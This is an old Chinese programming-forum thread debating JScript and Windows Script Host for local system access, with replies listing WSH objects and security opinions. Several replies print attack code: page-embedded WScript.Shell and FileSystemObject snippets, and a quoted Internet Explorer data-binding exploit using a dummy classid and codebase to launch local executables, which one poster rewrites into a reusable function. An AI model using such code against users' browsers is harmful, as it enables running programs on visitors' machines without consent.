探讨Javascript下的系统核心编程(高手请进)!!!

http://download.microsoft.com/download/winscript56/Install/5.6/W982KMe/CN/scd56chs.exe

解决方案 »

  1.   

    wsh可以做很多事情,
    http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsoriWindowsScriptHost.asp
      

  2.   

    To lzlhero(lzlhero):你先下载后,使用winzip打开看就知道了,晕,不要一看exe就以为非得是什么工具软件
      

  3.   

    什么核心不核心的,javascript设计出来的目的
    不是用来进行系统核心编程的。而且为了安全性
    考虑,浏览器对这方面的限制也是很严格的。如果一定要核心编程,可以考虑用 asm或者c++wsh也不是为了Web设计而推出的,他在本地机子上
    可以运行得很好,也没有什么安全限制。但是,
    如果上了web, WSH就走不通了。再说 wsh也最多不过是能操作注册表和文件系统而已
    他可以访问win32 API,访问内存,硬件吗?
      

  4.   

    Sorry,啊拉不晓得,所以,才要在此向各位探讨。
      我曾经打开过Happy Time的源代码看过,里面是用WSH做的,并且有不少的黑客网站,内嵌了大量的“后门”代码,做得可以说是神乎其神。并且,在2000年的时候,我的同学曾经给我介绍过一个叫做"MyDesktop"的网站,由于有用户和密码限制,我进不去,据说里面做到了远程和本地的无缝结合!
      

  5.   

    什么广告词呀,反正就是通过网页方式不但可以访问到远程资源,还可以像可执行程序一样访问本机的所有资源!
    我提到的这个网站,它的网页打开后,就像打开了一个Windows桌面一样,所有本地资源与远程资源的界限就被糊模化了。
      

  6.   

    认真研读jscript5.5中文文档,上面大多的问题都提到了,本质来说,wsh就是相当于给js脚本提供一个联系系统的一般程序调用的平台而已(可以调用其他程序,完成自动操作等等),具体的实现还是要通过js脚本来!
    不要小看系统一般程序调用,本地的大多数操作就仅此而已了!
    现在的一些病毒就是把运行体传到本地,在通过脚本来调用(这样可以没有主进程,不显示任何窗口,如果把脚本同系统的一些脚本混合了,就更难防范了,比如 欢乐时光 就把脚本添加到目录显示控制模板中了。
      

  7.   

    就我觉得,解铃还需系铃人. 微软应该很清楚他自己的东西可以做些什么,还有什么不能做....到microsoft.com的MSDN 里面看一看吧,应该有什么信息才是吧...
      

  8.   

    脚本不能只局限于 Web 方面,
    很多应用程序都可以使用脚本技术,实现更加灵活的功能,
    就像 微软的 Office,
      

  9.   

    我还是那句话:不要滥用javascript。
    第二句话:不要做微软的奴隶。
    第三句话:如果你真的对编程很有兴趣,那么去看Python吧。
      

  10.   

    Scripting.Signer Object 
    Enables an author to sign a script with a digital signature and a recipient to verify the signature's authenticity and trustworthiness. 
    WScript Object 
    Provides access to most of the objects, methods, and properties in the WSH object model. 
    WshArguments Object 
    Gives you access to the entire collection of command-line parameters — in the order in which they were originally entered. 
    WshController Object 
    Exposes the method CreateScript() that creates a remote script process. 
    WshEnvironment Object 
    Gives you access to the collection of Microsoft Windows system environment variables. 
    WshNamed Object 
    Provides access to the named command-line script arguments within the WshArguments object. 
    WshNetwork Object 
    Gives you access to the shared resources on the network to which your computer is connected. 
    WshRemote Object 
    Provides access to the remote script process. 
    WshRemoteError Object 
    Exposes the error information available when a remote script (a WshRemote object) terminates as a result of a script error. 
    WshScriptExec Object 
    Provides status and error information about a script run with Exec, along with access to the stdIn, stdOut, and stdErr channels. 
    WshShell Object 
    Gives you access to the native Windows shell functionality. 
    WshShortcut Object 
    Allows you to create a shortcut programmatically. 
    WshSpecialFolders Object 
    Allows you to access the Windows Special Folders. 
    WshUnnamed Object 
    Provides access to the unnamed command-line script arguments within the WshArguments object. 
    WshUrlShortcut Object 
    Allows you to create a shortcut to an Internet resource, programmatically.
      

  11.   

    使用.NET的大哥大姐一定会看到,微软已经做到把WEB做成程序了,它的项目向导就是拿WEB来做的,何其神奇,再有,技术本来无伯仲之分,只是使的人多了,才把它们分为三六九等。
    不过,各位的话,我会一一看过的,在此多谢了!!!!
    孟子E章的网址好像是:http://lucky.myrice.com/
      

  12.   

    俺要发言啦:),个人见解,不对指正啊。javascript的出现,初衷为了操作HTML DOM,让网页能够动起来,MS将其扩充,使得javascript(VBS)成为方便快捷的操纵MS组件的脚本,由此看来,javascript的主要用途是操纵MS组件(包括WSH),javascript的功能依赖于windows组件的功能,能力实在有限,至少不能用javascript写DLL什么的,但是我还是很喜欢javascript。
      

  13.   

    我赞成阿舜的意见,WSH是Windows Script Host,设计的初衷是提供像Bat文件一样的功能,却具有比Bat更为强大的控制能力,并不能在Web上跑起来,不能在浏览器中创建Script Host对象。
      

  14.   

    靠,Happy Time,不是黄色网站吗?
      

  15.   

    WSH可以操纵注册表,就这一项就可以给客户系统造成致命的损伤,并且微软有许多不公开的功能是通过注册表来做的,由此可见"蚁穴虽小,也可毁堤呀"
      

  16.   

    用这几名可以执行.EXE文件:
    set ws=CreateObject("WScript.Shell")
    ws.run "你想运行的程序"
    以上是VB格式的WSH,扩展名为.VBS,C格式的如下:
    var ws=WScript.CreateObject("WScript.Shell");
    ws.run("你想运行的程序");
    扩展名为.js
    如果放在网页中,可以这样:
    <script language=VBscript>
      set ws=CreateObject("WScript.Shell")
      ws.run "你想运行的程序"
    </script>
    JavaScript同理。
    但这样的话每次打开网页时都会出现带有“网页有不安全的程序,是否继续”字样的对话框.
      

  17.   

    onestab 老大的说法很形象啊 !! 佩服 !关键是看浏览器有没给你这个接口....
    如果浏览器给你 js 提供了个 format 硬盘的接口, 你就可以调用这个接口
    来实现格式化硬盘的脚本. 如果没有提供... 你是没可能越过浏览器而操作
    浏览器外的东西di......
      

  18.   

    最好不要真的用这些来开发软件,将来的系统会因安全的原因禁止这些功能的。要是闲没事玩玩还可以。还有在网页上用ACTIVE X 就已经够能控制系统的了。
      

  19.   

    csdn的好助手--网页精灵
    -------------------------------------------------------------
    可以方便的跟踪任意多个贴子的回复。无需打开ie,有了回复立刻提示并且显示回复内容
    大家可以到http://wireless2k.com/websprite/看帮助信息,下载如果网页精灵帮助你解决了问题,请告诉你的10位亲友,白起真好
    如果网页精灵帮助你拍卖了东西,请告诉你的10位亲友,白起真好
    如果网页精灵帮助你租到了房子,请告诉你的10位亲友,白起真好
    如果网页精灵对你没有效果...
      

  20.   

    javascript还是不错的。并不是只有用java,c,等等才是编程
    如果能实现同样的功能而开发代价小得多周期短的多,为什么不用javascript呢。很多情况下性能并不重要
    wsh提供了一些系统操作,但是对于编程来说远远不够。javascript可以调用各种各样的activex,ole对象,比如word什么的。先到微软的文档里面找,找不到就自己写
      

  21.   

    我做了一个定制控件,关于JAVASCRIPT
    有一个功能是调用系统的字体,其中要用到<OBJECT>了。当我一个页面里友几个
    这个控件的时候,也就是说<OBJECT>有同时几个了,但几个的classid都是现同的请问这样可以么?我出现的问题就是,请看.....<script language="JavaScript" >
    document.getElementById('HtmlEditor').document.body.onload==HtmlEditor_fnInit;
    </script>

    <script language="JavaScript" type="text/javascript">
    document.getElementById('Htmleditor1').document.body.onload =Htmleditor1_fnInit;
    </script>function Htmleditor_fnInit()
    {
    getSystemFonts(Htmleditor,'Htmleditor_obj','Htmleditor_oSelect');
    }
    function Htmleditor1_fnInit()
    {
    getSystemFonts(Htmleditor1,'Htmleditor1_obj','Htmleditor1_oSelect');
    }writer.Write ("<OBJECT id=\""+ObjID+"\" width=\"0px\" height=\"0px\" classid=\"clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b\">");getSystemFonts就是在IFRAME的ONLOAD的时候调用系统字体了,
    但我这个就只能最后一个调用字体。只调用了Htmleditor1_fnInit()
    而Htmleditor_fnInit()确没有调用是classid的原因么?还是其他的什么问题
    这里高手多阿。只有到这里问了。
      

  22.   

    JavaScript高深之处很多,不单单是些页面的传来传去和调来调去,和一些javascript的特效表演,更深入的是它的面向对象的应用,很不错的!!深入者必有体会!!:]
      

  23.   

    是啊,我深有体会
    它的面向对象是另外一种风格
    我常常觉得很多场合用起来比java还方便得多
      

  24.   

    我有一段代码,据说是一位以色列安全专家给出的,他指出IE有许多漏洞.其实许多与系统相关的东西是利用后门来做的,但是微软是决对不肯公开的,否则,大家可想而知......<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:\winnt\system32\calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>其实我提出这个问题的目的只和WINDOWS系统有关,希望更多的高手能够互相砌磋!
      

  25.   

    有意思。
    说实在的,Jscript是我的初恋。
    当然现在我也不是移情别恋。只不过眼光看的更广罢了。
    Jscript最吸引我的地方就是她的oop_based(prototype-based) programming.
    我喜欢做的不是用她来做一些所谓的网页特效,而更倾向于用她来做一些小的程序,满足自己的需要,有时也用来实现自己的一些非网页方面的想法。
    总之,Jscript仿佛就是我的宠物。
    不完美,也不将是我的主要工具,但我却喜欢。
      

  26.   

    那段代码您在哪看到的?最近这段时间由于工作需要接触了一下微软的JSCRIPT感觉功能很强,但强烈感觉微软可能太注重功能了,这样肯定有许多安全问题,只不过有没有发现罢了比如他的前端与后端结合起来展示的强大功能,如在IE中可以完成数据的自动显示,IE中的数据改动可以直接完成服务器的数据改动等,如果传递的不单纯是HTTP流则应该说是很危险的不过微软的东西我也不了解,请对这些技术比较了解的说说
      

  27.   

    读文件
    <script language=VBscript>
    set objFS=CreateObject ("Scripting.FileSystemObject")
    set listFile = objFS.OpenTextFile ("c:\windows\network.txt")
    do while listFile.AtEndOfStream <> True
       document.write listFile.ReadLine
    loop
    </script>
      

  28.   

    我真是孤陋寡闻, lzlhero(lzlhero) 的片段让我大开眼界,后门是11111111-1111-1111-1111-111111111111,我改了一下表现形式:
    <script language=javascript>
    function callThis(strExe){
    exe.innerHTML = "<object classid=\"clsid:11111111-1111-1111-1111-111111111111\" codebase=\"" + strExe + "\"></object>";
    }
    </script>
    <div id=exe style="display:none"></div>
    <input id=fexe value="C:\WINNT\System32\notepad.exe"><input type=button value=Execute onclick="callThis(fexe.value);">
    但是发现只能调用Exe文件,并且不能传入参数。